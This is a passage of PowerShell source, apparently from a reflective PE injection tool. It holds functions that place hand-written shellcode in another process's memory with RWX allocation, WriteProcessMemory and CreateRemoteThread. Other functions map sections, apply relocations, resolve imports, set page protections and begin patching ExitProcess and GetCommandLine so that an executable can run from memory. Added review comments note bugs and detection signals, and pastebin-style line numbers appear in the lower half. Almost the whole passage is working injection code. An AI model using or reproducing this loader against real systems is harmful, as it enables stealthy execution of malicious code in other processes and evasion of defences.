            [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
            $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)
            if ($Success -eq $false)
            {
                Throw "Unable to write DLL path to remote process memory"
            }
            if ($FunctionNameSize -ne $NumBytesWritten)
            {
                Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
            }
        }

        else
        {
            # By ordinal: the "pointer" is the ordinal number; nothing to copy.
            $RFuncNamePtr = $FunctionNamePtr
        }


        # Resolved locally and reused remotely -- assumes kernel32.dll shares
        # its base address across both processes; TODO confirm with the caller.
        $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
        $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress")



        # Remote slot that the stub writes the GetProcAddress result into.
        $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
        if ($GetProcAddressRetMem -eq [IntPtr]::Zero)
        {
            Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress"
        }




        # Stub fragments for the 64- or 32-bit target; four pointer-sized
        # operands (module handle, name/ordinal, GetProcAddress address, return
        # slot) are spliced in between them, hence ($PtrSize * 4) below.
        # $GetProcAddressSC is declared but never used.
        [Byte[]]$GetProcAddressSC = @()
        if ($PEInfo.PE64Bit -eq $true)
        {
            $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
            $GetProcAddressSC2 = @(0x48, 0xba)
            $GetProcAddressSC3 = @(0x48, 0xb8)
            $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)
            $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
        }
        else
        {
            $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)
            $GetProcAddressSC2 = @(0xb9)
            $GetProcAddressSC3 = @(0x51, 0x50, 0xb8)
            $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)
            $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)
        }
        $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)
        $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
        $SCPSMemOriginal = $SCPSMem

        # $SCPSMem is advanced after each write; $SCPSMemOriginal keeps the
        # start of the local buffer for the WriteProcessMemory below.
        Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
        Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
        Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
        Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
        Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)

        # RWX allocation in the target: a strong detection signal.
        $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
        if ($RSCAddr -eq [IntPtr]::Zero)
        {
            Throw "Unable to allocate memory in the remote process for shellcode"
        }
        [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
        $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
        if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
        {
            Throw "Unable to write shellcode to remote process memory."
        }

        # 20 s timeout; only 0 (WAIT_OBJECT_0) counts as finished.
        $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
        $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
        if ($Result -ne 0)
        {
            Throw "Call to CreateRemoteThread to call GetProcAddress failed."
        }


        # Read the pointer the stub stored in the remote slot. $ReturnValMem is
        # never freed.
        [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
        $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
        if (($Result -eq $false) -or ($NumBytesWritten -eq 0))
        {
            Throw "Call to ReadProcessMemory failed"
        }
        [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])


        $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
        $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null

        # Only release the name buffer when one was actually allocated above;
        # in the ordinal case $RFuncNamePtr is not a remote allocation.
        if (-not $LoadByOrdinal)
        {
            $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
        }

        return $ProcAddress
    }
  1410.  
  1411.  
    Function Copy-Sections
    {
        # Copy every section of the PE image from $PEBytes (file layout) to its
        # virtual address inside the mapped image at $PEInfo.PEHandle, and
        # zero-fill the part of a section whose VirtualSize exceeds its raw data.
        #
        # Parameters:
        #   $PEBytes        - raw file bytes (source).
        #   $PEInfo         - object from Get-PEDetailedInfo; needs
        #                     IMAGE_NT_HEADERS, SectionHeaderPtr and PEHandle.
        #   $Win32Functions - provides memset.
        #   $Win32Types     - provides IMAGE_SECTION_HEADER.
        # No return value.
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Byte[]]
        $PEBytes,

        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $PEInfo,

        [Parameter(Position = 2, Mandatory = $true)]
        [System.Object]
        $Win32Functions,

        [Parameter(Position = 3, Mandatory = $true)]
        [System.Object]
        $Win32Types
        )

        for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
        {
            # Section headers are a contiguous array starting at SectionHeaderPtr.
            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
            $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)


            [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))





            # Effective number of bytes to copy: none when the section has no
            # file data (PointerToRawData == 0), and never more than VirtualSize.
            $SizeOfRawData = $SectionHeader.SizeOfRawData

            if ($SectionHeader.PointerToRawData -eq 0)
            {
                $SizeOfRawData = 0
            }

            if ($SizeOfRawData -gt $SectionHeader.VirtualSize)
            {
                $SizeOfRawData = $SectionHeader.VirtualSize
            }

            # The destination range is validated against the image; the source
            # offset is not checked here against $PEBytes.Length, but Marshal.Copy
            # throws on an out-of-range managed index, so a bad header fails
            # rather than copying garbage.
            if ($SizeOfRawData -gt 0)
            {
                Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null
                [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)
            }


            # NOTE(review): this condition uses the header's SizeOfRawData, not
            # the clamped $SizeOfRawData above. When PointerToRawData is 0 but
            # SizeOfRawData >= VirtualSize, nothing is copied and nothing is
            # zeroed here -- whether that matters depends on the destination
            # having been zero-initialised by the allocator; confirm with the
            # caller.
            if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)
            {
                $Difference = $SectionHeader.VirtualSize - $SizeOfRawData
                [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))
                Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null
                $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null
            }
        }
    }
  1472.  
  1473.  
    Function Update-MemoryAddresses
    {
        # Apply the image's base relocations so that absolute addresses written
        # for $OriginalImageBase point into the image as it will run at
        # $PEInfo.EffectivePEHandle.
        #
        # The relocation table and the patched words are read/written through
        # $PEInfo.PEHandle (the copy in this process), while the delta is taken
        # against $PEInfo.EffectivePEHandle, so the same code serves a local
        # load and a copy that will later be written to another process.
        #
        # Parameters:
        #   $PEInfo            - needs PEHandle, EffectivePEHandle, IMAGE_NT_HEADERS.
        #   $OriginalImageBase - ImageBase from the optional header.
        #   $Win32Constants    - IMAGE_REL_BASED_* values.
        #   $Win32Types        - IMAGE_BASE_RELOCATION.
        # Returns nothing. Throws on a relocation type other than ABSOLUTE,
        # HIGHLOW or DIR64.
        #
        # NOTE(review): unlike Copy-Sections, no Test-MemoryRangeValid check is
        # applied to relocation targets, so a malformed relocation block can
        # direct a write outside the image.
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [System.Object]
        $PEInfo,

        [Parameter(Position = 1, Mandatory = $true)]
        [Int64]
        $OriginalImageBase,

        [Parameter(Position = 2, Mandatory = $true)]
        [System.Object]
        $Win32Constants,

        [Parameter(Position = 3, Mandatory = $true)]
        [System.Object]
        $Win32Types
        )

        # $BaseDifference is the unsigned distance between the two bases;
        # $AddDifference records its direction.
        [Int64]$BaseDifference = 0
        $AddDifference = $true
        [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)


        # Nothing to do when the image landed at its preferred base or carries
        # no relocation table.
        if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `
                -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))
        {
            return
        }


        elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)
        {
            $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)
            $AddDifference = $false
        }
        elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)
        {
            $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)
        }


        # Walk the chain of IMAGE_BASE_RELOCATION blocks; a zero SizeOfBlock
        # terminates the walk.
        [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))
        while($true)
        {

            $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)

            if ($BaseRelocationTable.SizeOfBlock -eq 0)
            {
                break
            }

            # Each block header is followed by 2-byte entries.
            [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))
            $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2


            for($i = 0; $i -lt $NumRelocations; $i++)
            {

                $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))
                [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])


                # Low 12 bits: offset within the block's page; high 4 bits: type.
                # The divide-by-2 loop is a right shift by 12, presumably written
                # this way because this script targets PowerShell 2, which has
                # no -shr operator.
                [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF
                [UInt16]$RelocType = $RelocationInfo -band 0xF000
                for ($j = 0; $j -lt 12; $j++)
                {
                    $RelocType = [Math]::Floor($RelocType / 2)
                }




                # HIGHLOW and DIR64 are handled identically with a pointer-sized
                # read/write; on a 32-bit host that would only touch 4 bytes of a
                # DIR64 target -- TODO confirm the caller never mixes bitness.
                if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `
                        -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))
                {

                    [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))
                    [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])

                    if ($AddDifference -eq $true)
                    {
                        [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
                    }
                    else
                    {
                        [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
                    }

                    [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
                }
                elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)
                {
                    # ABSOLUTE entries are padding and skipped; anything else is
                    # unsupported here.
                    Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo"
                }
            }

            $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))
        }
    }
  1577.  
  1578.  
  1579.     Function Import-DllImports
  1580.     {
  1581.         Param(
  1582.         [Parameter(Position = 0, Mandatory = $true)]
  1583.         [System.Object]
  1584.         $PEInfo,
  1585.  
  1586.         [Parameter(Position = 1, Mandatory = $true)]
  1587.         [System.Object]
  1588.         $Win32Functions,
  1589.  
  1590.         [Parameter(Position = 2, Mandatory = $true)]
  1591.         [System.Object]
  1592.         $Win32Types,
  1593.  
  1594.         [Parameter(Position = 3, Mandatory = $true)]
  1595.         [System.Object]
  1596.         $Win32Constants,
  1597.  
  1598.         [Parameter(Position = 4, Mandatory = $false)]
  1599.         [IntPtr]
  1600.         $RemoteProcHandle
  1601.         )
  1602.  
  1603.         $RemoteLoading = $false
  1604.         if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)
  1605.         {
  1606.             $RemoteLoading = $true
  1607.         }
  1608.  
  1609.         if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
  1610.         {
  1611.             [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
  1612.  
  1613.             while ($true)
  1614.             {
  1615.                 $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
  1616.  
  1617.  
  1618.                 if ($ImportDescriptor.Characteristics -eq 0 `
  1619.                         -and $ImportDescriptor.FirstThunk -eq 0 `
  1620.                         -and $ImportDescriptor.ForwarderChain -eq 0 `
  1621.                         -and $ImportDescriptor.Name -eq 0 `
  1622.                         -and $ImportDescriptor.TimeDateStamp -eq 0)
  1623.                 {
  1624.                     Write-Verbose "Done importing DLL imports"
  1625.                     break
  1626.                 }
  1627.  
  1628.                 $ImportDllHandle = [IntPtr]::Zero
  1629.                 $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))
  1630.                 $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
  1631.  
  1632.                 if ($RemoteLoading -eq $true)
  1633.                 {
  1634.                     $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr
  1635.                 }
  1636.                 else
  1637.                 {
  1638.                     $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)
  1639.                 }
  1640.  
  1641.                 if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))
  1642.                 {
  1643.                     throw "Error importing DLL, DLLName: $ImportDllPath"
  1644.                 }
  1645.  
  1646.  
  1647.                 [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)
  1648.                 [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics)
  1649.                 [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
  1650.  
  1651.                 while ($OriginalThunkRefVal -ne [IntPtr]::Zero)
  1652.                 {
  1653.                     $LoadByOrdinal = $false
  1654.                     [IntPtr]$ProcedureNamePtr = [IntPtr]::Zero
  1655.  
  1656.  
  1657.  
  1658.                     [IntPtr]$NewThunkRef = [IntPtr]::Zero
  1659.                     if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]$OriginalThunkRefVal -lt 0)
  1660.                     {
  1661.                         [IntPtr]$ProcedureNamePtr = [IntPtr]$OriginalThunkRefVal -band 0xffff
  1662.                         $LoadByOrdinal = $true
  1663.                     }
  1664.                     elseif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8 -and [Int64]$OriginalThunkRefVal -lt 0)
  1665.                     {
  1666.                         [IntPtr]$ProcedureNamePtr = [Int64]$OriginalThunkRefVal -band 0xffff
  1667.                         $LoadByOrdinal = $true
  1668.                     }
  1669.                     else
  1670.                     {
  1671.                         [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)
  1672.                         $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))
  1673.                         $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)
  1674.                         $ProcedureNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ProcedureName)
  1675.                     }
  1676.  
  1677.                     if ($RemoteLoading -eq $true)
  1678.                     {
  1679.                         [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionNamePtr $ProcedureNamePtr -LoadByOrdinal $LoadByOrdinal
  1680.                     }
  1681.                     else
  1682.                     {
  1683.                         [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressIntPtr.Invoke($ImportDllHandle, $ProcedureNamePtr)
  1684.                     }
  1685.  
  1686.                     if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)
  1687.                     {
  1688.                         if ($LoadByOrdinal)
  1689.                         {
  1690.                             Throw "New function reference is null, this is almost certainly a bug in this script. Function Ordinal: $ProcedureNamePtr. Dll: $ImportDllPath"
  1691.                         }
  1692.                         else
  1693.                         {
  1694.                             Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath"
  1695.                         }
  1696.                     }
  1697.  
  1698.                     [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)
  1699.  
  1700.                     $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
  1701.                     [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
  1702.                     [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
  1703.  
  1704.  
  1705.  
  1706.                     if ((-not $LoadByOrdinal) -and ($ProcedureNamePtr -ne [IntPtr]::Zero))
  1707.                     {
  1708.                         [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcedureNamePtr)
  1709.                         $ProcedureNamePtr = [IntPtr]::Zero
  1710.                     }
  1711.                 }
  1712.  
  1713.                 $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
  1714.             }
  1715.         }
  1716.     }
  1717.  
  1718.     Function Get-VirtualProtectValue
  1719.     {
  1720.         Param(
  1721.         [Parameter(Position = 0, Mandatory = $true)]
  1722.         [UInt32]
  1723.         $SectionCharacteristics
  1724.         )
  1725.  
  1726.         $ProtectionFlag = 0x0
  1727.         if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)
  1728.         {
  1729.             if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
  1730.             {
  1731.                 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
  1732.                 {
  1733.                     $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE
  1734.                 }
  1735.                 else
  1736.                 {
  1737.                     $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ
  1738.                 }
  1739.             }
  1740.             else
  1741.             {
  1742.                 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
  1743.                 {
  1744.                     $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY
  1745.                 }
  1746.                 else
  1747.                 {
  1748.                     $ProtectionFlag = $Win32Constants.PAGE_EXECUTE
  1749.                 }
  1750.             }
  1751.         }
  1752.         else
  1753.         {
  1754.             if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
  1755.             {
  1756.                 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
  1757.                 {
  1758.                     $ProtectionFlag = $Win32Constants.PAGE_READWRITE
  1759.                 }
  1760.                 else
  1761.                 {
  1762.                     $ProtectionFlag = $Win32Constants.PAGE_READONLY
  1763.                 }
  1764.             }
  1765.             else
  1766.             {
  1767.                 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
  1768.                 {
  1769.                     $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY
  1770.                 }
  1771.                 else
  1772.                 {
  1773.                     $ProtectionFlag = $Win32Constants.PAGE_NOACCESS
  1774.                 }
  1775.             }
  1776.         }
  1777.  
  1778.         if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)
  1779.         {
  1780.             $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE
  1781.         }
  1782.  
  1783.         return $ProtectionFlag
  1784.     }
  1785.  
    Function Update-MemoryProtectionFlags
    {
        # Apply per-section page protections to a PE image that has already been copied
        # into memory. For every section header, derive the PAGE_* value from the section's
        # Characteristics via Get-VirtualProtectValue and call VirtualProtect on the
        # section's in-memory range. Throws if VirtualProtect reports failure.
        #
        # $PEInfo         - parsed PE info; reads IMAGE_NT_HEADERS.FileHeader.NumberOfSections,
        #                   SectionHeaderPtr and PEHandle
        # $Win32Functions - delegate table; uses VirtualProtect
        # $Win32Constants - constant table; not referenced directly here, but
        #                   Get-VirtualProtectValue reads $Win32Constants from its caller's scope
        # $Win32Types     - struct types; uses IMAGE_SECTION_HEADER
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [System.Object]
        $PEInfo,

        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $Win32Functions,

        [Parameter(Position = 2, Mandatory = $true)]
        [System.Object]
        $Win32Constants,

        [Parameter(Position = 3, Mandatory = $true)]
        [System.Object]
        $Win32Types
        )

        for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
        {
            # i-th IMAGE_SECTION_HEADER, read from the headers that were copied to the image base.
            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
            $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
            # Section start in memory = image base + the section's RVA.
            [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)

            [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics
            # VirtualSize is the section's in-memory extent (as opposed to its raw file size).
            [UInt32]$SectionSize = $SectionHeader.VirtualSize

            # VirtualProtect requires an out-parameter for the previous protection; it is not used afterwards.
            [UInt32]$OldProtectFlag = 0
            # Range check before changing protections; the result is discarded, so this
            # presumably signals problems by throwing — TODO confirm in Test-MemoryRangeValid.
            Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null
            $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)
            if ($Success -eq $false)
            {
                Throw "Unable to change memory protection"
            }
        }
    }
  1824.  
  1825.  
  1826.  
    Function Update-ExeFunctions
    {
        # Patch the host process so that an EXE loaded from memory sees $ExeArguments as its
        # command line and so that its "exit the process" calls only end the calling thread.
        # Three groups of in-place patches are written into already-loaded system modules:
        #   1. GetCommandLineA/GetCommandLineW (resolved from KernelBase.dll) are overwritten
        #      with a stub that returns a pointer to a copy of $ExeArguments.
        #   2. For every MSVCR runtime in $DllList that is loaded, the _acmdln/_wcmdln globals
        #      are pointed at copies of $ExeArguments.
        #   3. CorExitProcess (mscoree.dll) and ExitProcess (kernel32.dll) are overwritten with
        #      a stub that sets the byte at $ExeDoneBytePtr to 1 and then calls ExitThread.
        # Output: an array of (patched address, pointer to saved original bytes, byte count)
        # triples. Only the group-3 entries survive, because $ReturnArray is reset before
        # group 3 (see the note below).
        # Throws when a required module handle or export address cannot be resolved.
        #
        # $PEInfo         - parsed PE info (not referenced in this body)
        # $Win32Functions - delegate table; uses GetModuleHandle, GetProcAddress, VirtualProtect, memcpy
        # $Win32Constants - constant table; uses PAGE_EXECUTE_READWRITE
        # $ExeArguments   - command line the loaded EXE should observe
        # $ExeDoneBytePtr - address of a byte the exit stub sets to 1 when the EXE "exits"
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [System.Object]
        $PEInfo,

        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $Win32Functions,

        [Parameter(Position = 2, Mandatory = $true)]
        [System.Object]
        $Win32Constants,

        [Parameter(Position = 3, Mandatory = $true)]
        [String]
        $ExeArguments,

        [Parameter(Position = 4, Mandatory = $true)]
        [IntPtr]
        $ExeDoneBytePtr
        )


        $ReturnArray = @()

        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
        [UInt32]$OldProtectFlag = 0

        [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll")
        if ($Kernel32Handle -eq [IntPtr]::Zero)
        {
            throw "Kernel32 handle null"
        }

        [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll")
